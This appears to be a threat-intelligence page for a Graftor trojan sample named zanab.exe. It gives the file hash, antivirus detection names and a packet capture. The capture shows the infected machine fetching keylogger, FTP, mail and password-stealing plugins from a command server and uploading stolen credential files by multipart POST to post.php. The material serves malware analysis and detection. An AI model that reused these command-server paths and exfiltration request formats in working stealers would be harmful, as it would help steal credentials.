Graftor Malware Trojan zanab.exe POST /poon/post.php www.gongotree.com Traffic Sample PCAP file Download

SHA256: 8fd5bcadd9ae6b1875024f1d5ca24a579727905f440600631ec972712f28c3f5
File name: zanab.exe
Detection ratio: 41 / 55
Analysis date: 2017-01-24 02:48:20 UTC
ALYac Gen:Variant.Graftor.318298 20170123
AVG Luhe.Packed.C 20170123
AVware Trojan.Win32.Generic!BT 20170124
Ad-Aware Gen:Variant.Graftor.318298 20170124
AegisLab W32.W.Otwycal.l6ei 20170123
AhnLab-V3 Trojan/Win32.Fsysna.C1743112 20170123
Antiy-AVL Trojan/Win32.Fsysna 20170124
Arcabit Trojan.Graftor.D4DB5A 20170124
Avast Win32:Malware-gen 20170124
Avira (no cloud) DR/Delphi.bsqgm 20170123
BitDefender Gen:Variant.Graftor.318298 20170124
CAT-QuickHeal (Suspicious) - DNAScan 20170123
Comodo TrojWare.Win32.Spy.Banker.Gen 20170124
CrowdStrike Falcon (ML) malicious_confidence_83% (W) 20161024
Cyren W32/SysVenFak.A.gen!Eldorado 20170124
DrWeb Trojan.DownLoader14.15241 20170124
ESET-NOD32 a variant of Win32/Injector.DJNW 20170124
Emsisoft Gen:Variant.Graftor.318298 (B) 20170124
F-Prot W32/SysVenFak.A.gen!Eldorado 20170124

2017-01-23 21:08:29.692015 IP 192.168.1.102.50506 > 46.173.219.26.80: Flags [P.], seq 0:289, ack 1, win 259, length 289: HTTP: GET /utu/zanab.exe HTTP/1.1
E..I.p@….i…f…..J.P.c.;J.?lP…J…GET /utu/zanab.exe HTTP/1.1
Accept: application/x-shockwave-flash, image/gif, image/jpeg, image/pjpeg, */*
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
Accept-Encoding: gzip, deflate
Host: gongotree.com
Connection: Keep-Alive

2017-01-23 21:08:48.852699 IP 192.168.1.102.65517 > 75.75.75.75.53: 49466+ A? www.gongotree.com. (35)
E..?i…..x}…fKKKK…5.+:..:………..www    gongotree.com…..
2017-01-23 21:08:49.262241 IP 192.168.1.102.50507 > 46.173.219.26.80: Flags [S], seq 318064516, win 8192, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0
E..4..@….>…f…..K.P..G……. .c%…………..
2017-01-23 21:08:49.430597 IP 192.168.1.102.50507 > 46.173.219.26.80: Flags [.], ack 1051249154, win 259, length 0
E..(..@….I…f…..K.P..G.>…P….:……..
2017-01-23 21:08:49.431268 IP 192.168.1.102.50507 > 46.173.219.26.80: Flags [P.], seq 0:213, ack 1, win 259, length 213: HTTP: GET /poon/plugins/keylogger.p HTTP/1.1
E…..@….s…f…..K.P..G.>…P…….GET /poon/plugins/keylogger.p HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0)
Host: www.gongotree.com
Connection: Keep-Alive

2017-01-23 21:08:53.294595 IP 192.168.1.102.50507 > 46.173.219.26.80: Flags [P.], seq 213:298, ack 32961, win 254, length 85: HTTP: GET /poon/plugins/ftp.p HTTP/1.1
E..}..@……..f…..K.P..HZ>.J.P….)..GET /poon/plugins/ftp.p HTTP/1.1
User-Agent: vb wininet
Host: www.gongotree.com

2017-01-23 21:08:57.412231 IP 192.168.1.102.50508 > 46.173.219.26.80: Flags [P.], seq 0:371, ack 1, win 259, length 371: HTTP: POST /poon/post.php?pl=&slots=1 HTTP/1.1
E…..@……..f…..L.P]…(…P…….POST /poon/post.php?pl=&slots=1 HTTP/1.1
Content-Type: multipart/form-data; boundary=Xu02=$
Content-Length: 121
Accept: */*
User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
Host: www.gongotree.com
Connection: Keep-Alive

--Xu02=$
Content-Disposition: form-data; name="upload1"; filename="FTP-BCC017C5.txt"
Content-type: file

--Xu02=$--
2017-01-23 21:08:58.096953 IP 192.168.1.102.50508 > 46.173.219.26.80: Flags [.], ack 394, win 257, length 0
E..(..@….#…f…..L.P]..T(…P….X……..
2017-01-23 21:09:01.107016 IP 192.168.1.102.50507 > 46.173.219.26.80: Flags [P.], seq 298:384, ack 49537, win 259, length 86: HTTP: GET /poon/plugins/mail.p HTTP/1.1
E..~..@……..f…..K.P..H.>…P….K..GET /poon/plugins/mail.p HTTP/1.1
User-Agent: vb wininet
Host: www.gongotree.com

2017-01-23 21:09:05.220043 IP 192.168.1.102.50508 > 46.173.219.26.80: Flags [P.], seq 371:743, ack 394, win 257, length 372: HTTP: POST /poon/post.php?pl=&slots=1 HTTP/1.1
E…..@……..f…..L.P]..T(…P…….POST /poon/post.php?pl=&slots=1 HTTP/1.1
Content-Type: multipart/form-data; boundary=Xu02=$
Content-Length: 122
Accept: */*
User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
Host: www.gongotree.com
Connection: Keep-Alive

--Xu02=$
Content-Disposition: form-data; name="upload1"; filename="MAIL-BCC017C5.TxT"
Content-type: file

--Xu02=$--
2017-01-23 21:09:05.801224 IP 192.168.1.102.50508 > 46.173.219.26.80: Flags [.], ack 787, win 256, length 0
E..(..@……..f…..L.P]…(..”P….\……..
2017-01-23 21:09:06.944920 IP 192.168.1.102.49725 > 75.75.75.75.53: 57531+ A? www.googleapis.com. (36)
E..@i…..xz…fKKKK.=.5.,.P………….www
googleapis.com…..
2017-01-23 21:09:08.751880 IP 192.168.1.102.50507 > 46.173.219.26.80: Flags [P.], seq 384:475, ack 106657, win 259, length 91: HTTP: GET /poon/plugins/passwords.p HTTP/1.1
E…..@……..f…..K.P..I.>.j.P…:^..GET /poon/plugins/passwords.p HTTP/1.1
User-Agent: vb wininet
Host: www.gongotree.com

2017-01-23 21:09:14.342485 IP 192.168.1.102.50508 > 46.173.219.26.80: Flags [P.], seq 743:1113, ack 787, win 256, length 370: HTTP: POST /poon/post.php?pl=&slots=1 HTTP/1.1
E….:@….N…f…..L.P]…(..”P…0r..POST /poon/post.php?pl=&slots=1 HTTP/1.1
Content-Type: multipart/form-data; boundary=Xu02=$
Content-Length: 120
Accept: */*
User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
Host: www.gongotree.com
Connection: Keep-Alive

--Xu02=$
Content-Disposition: form-data; name="upload1"; filename="PW-BCC017C5.LOG"
Content-type: file

--Xu02=$--
2017-01-23 21:09:16.475901 IP 192.168.1.102.50508 > 46.173.219.26.80: Flags [.], ack 1180, win 254, length 0
E..(.;@……..f…..L.P]..:(…P….c……..
2017-01-23 21:09:20.641990 IP 192.168.1.102.59592 > 75.75.75.75.53: 8551+ A? oem.twimg.com. (31)
E..;i…..x{…fKKKK…5.’..!g………..oem.twimg.com…..
2017-01-23 21:09:20.641998 IP 192.168.1.102.64219 > 75.75.75.75.53: 4920+ A? cdn.content.prod.cms.msn.com. (46)
E..Ji…..xk…fKKKK…5.6x..8………..cdn.content.prod.cms.msn.com…..
2017-01-23 21:09:20.659012 IP 192.168.1.102.64219 > 75.75.76.76.53: 4920+ A? cdn.content.prod.cms.msn.com. (46)
E..JS……….fKKLL…5.6w..8………..cdn.content.prod.cms.msn.com…..
2017-01-23 21:09:20.659020 IP 192.168.1.102.59592 > 75.75.76.76.53: 8551+ A? oem.twimg.com. (31)
E..;S……….fKKLL…5.’..!g………..oem.twimg.com…..
2017-01-23 21:09:23.439161 IP 192.168.1.102.50506 > 46.173.219.26.80: Flags [.], ack 870606, win 1349, length 0
E..(.<@……..f…..J.P.c.\J..9P..E……….
2017-01-23 21:09:23.770262 IP 192.168.1.102.50506 > 46.173.219.26.80: Flags [F.], seq 289, ack 870606, win 1349, length 0
E..(.=@……..f…..J.P.c.\J..9P..E……….
2017-01-23 21:09:36.598111 IP 192.168.1.102.50508 > 46.173.219.26.80: Flags [P.], seq 1113:1263, ack 1180, win 254, length 150: HTTP: GET /poon/ HTTP/1.1
E….>@….&…f…..L.P]..:(…P…e_..GET /poon/ HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MyApp 1.0; Windows NT 5.1)
Accept: */*
Host: www.gongotree.com
Connection: Keep-Alive